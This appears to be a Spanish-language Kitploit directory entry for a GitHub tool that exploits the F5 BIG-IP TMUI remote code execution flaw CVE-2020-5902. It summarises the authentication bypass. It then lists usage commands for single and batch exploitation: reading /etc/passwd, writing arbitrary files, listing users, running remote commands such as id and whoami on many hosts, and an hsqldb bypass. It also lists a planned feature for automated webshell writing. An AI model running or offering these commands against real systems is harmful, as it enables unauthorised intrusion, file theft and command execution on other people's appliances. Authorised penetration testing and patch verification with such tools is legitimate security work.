Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
f5-bigip-rce-cve-2020-5902 — Herramienta de comprobación automática de RCE en F5 BIG-IP CVE-2020-5902 | Kitploit
Herramientas/GitHubGitHub/thelsa/f5-bigip-rce-cve-2020-5902
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónComando y Control
GitHubthelsa/f5-bigip-rce-cve-2020-5902

f5-bigip-rce-cve-2020-5902

Herramienta de comprobación automática de RCE en F5 BIG-IP CVE-2020-5902

Ver Repositorio
62172hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

F5 BIG-IP RCE (CVE-2020-5902) Herramienta de detección de vulnerabilidades

Resumen

El 20200706, se filtró en línea una vulnerabilidad RCE en la interfaz de administración de tráfico (TMUI) de F5 BIG-IP.

El componente TMUI (Interfaz de usuario de gestión de tráfico) de F5 BIG-IP tiene una vulnerabilidad de omisión de autenticación. Esta vulnerabilidad se debe a una diferencia entre la URL analizada por Tomcat y request.getPathInfo(), lo que permite omitir la verificación de permisos, acceder sin autenticación a todas las funciones del módulo TMUI, y posteriormente leer/escribir archivos arbitrarios, ejecutar comandos, etc.

Ver detalles en Reproducción y puntos de atención de la vulnerabilidad RCE en F5 BIG-IP TMUI (CVE-2020-5902)

Esta herramienta admite detección de IP única, detección por lotes, lectura/escritura de archivos, listado de usuarios autenticados, listado de directorios, ejecución remota de comandos y detección de omisión de autenticación hsqldb.

Inicio rápido

pip install requests

hlep

python f5-bigip-rce-cve-2020-5902.py -h

comprobación de POC

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --check

comprobación de POC por lotes

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --check -t 20 -s 10

leer archivo

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --fileread "/etc/passwd"

guardar archivo

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --filepath "/tmp/xxx.txt" --filecontent "x"

listar usuarios autenticados

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --list-users

listar directorio

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --listdir "/tmp/"

RCE

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --rce id --still-exploit

RCE por lotes

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --rce whoami --still-exploit -s 15 -t 20

comprobación de omisión hsqldb

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --bypass-hsqldb

comprobación de omisión hsqldb por lotes

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --bypass-hsqldb

Nota

En las IPs por lotes, se recomienda agregar http:// o https:// al inicio. Si no se especifica protocolo, se agregará http:// por defecto.

Si las condiciones lo permiten, se sugiere agregar el parámetro --still-exploit. Esto permite ejecutar RCE incluso si falla el listado de usuarios autenticados, aumentando la tasa de éxito.

Tareas pendientes

  1. Enviar múltiples solicitudes para aumentar la tasa de éxito en lotes, teniendo en cuenta el equilibrio con la eficiencia.

  2. Integrar la explotación de deserialización a través de la interfaz hsqldb.

  3. Agregar escritura automatizada de webshell.

Comentarios

issus
lsablog
gmail:[email protected]
qq:[email protected]

Descargar herramienta